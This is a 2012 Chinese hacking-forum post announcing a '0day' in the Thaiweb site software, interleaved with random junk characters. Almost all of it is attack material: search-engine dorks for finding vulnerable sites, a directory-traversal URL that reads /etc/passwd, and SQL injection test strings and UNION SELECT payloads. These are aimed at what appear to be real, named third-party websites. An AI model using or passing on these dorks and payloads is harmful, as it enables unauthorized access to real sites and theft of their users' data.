找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2142|回复: 0
打印 上一主题 下一主题

Thaiweb远程文件sql注入漏洞0day

[复制链接]
跳转到指定楼层
楼主
发表于 2012-12-27 08:38:39 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
Google之:
( @1 r3 J0 m  X! L4 f9 e+ x" n4 X' L# Q, H$ f( }+ Q
intext:powered by Thaiweb
  I7 J. _; ]5 {4 t1 k4 }1 H4 y* l
inurl:index.php?page=board.php
; k5 l1 s9 _3 K' b7 \
3 Z% I  X" x1 m! k
' V) S* ?' E+ w0 m$ D- h8 X" A, r# U6 B, E# O2 S
利用点1:http://www.xfack.com/index.php?p ... ../../../etc/passwd! N' p% V9 d; z9 v& J- f  G  p) l

. k1 E' h  n8 X6 P% B 2 X/ B; h. ~5 U3 b, Y7 J

9 B6 X' R0 o) I$ P利用点2:http://www.xfack.com/index.php?page=boardque.php&bod_id=4'
3 D; s4 L9 {- b$ Q, R" S9 T8 D
) O  p' a# x+ T1 {( E( F5 ? + c9 u0 _4 v6 |& }4 D2 P, i) c

+ \% n3 ^5 H# d9 X$ n! q  Rhttp://www.keytasin.com//index.p ... d=-4+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,316--  g# G5 Y' h, \3 R

  M( p- a, [: S7 C5 `* Ahttp://www.autopartnerthailand.c ... d=-4+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,316--
4 i* o+ ^% X: g1 g# F- c) i! o" [
4 n( @0 [: W% \http://gift.in.th/index.php?page ... d=-4+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,316--
2 R: l# l: R$ [: b# t" Y  [
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表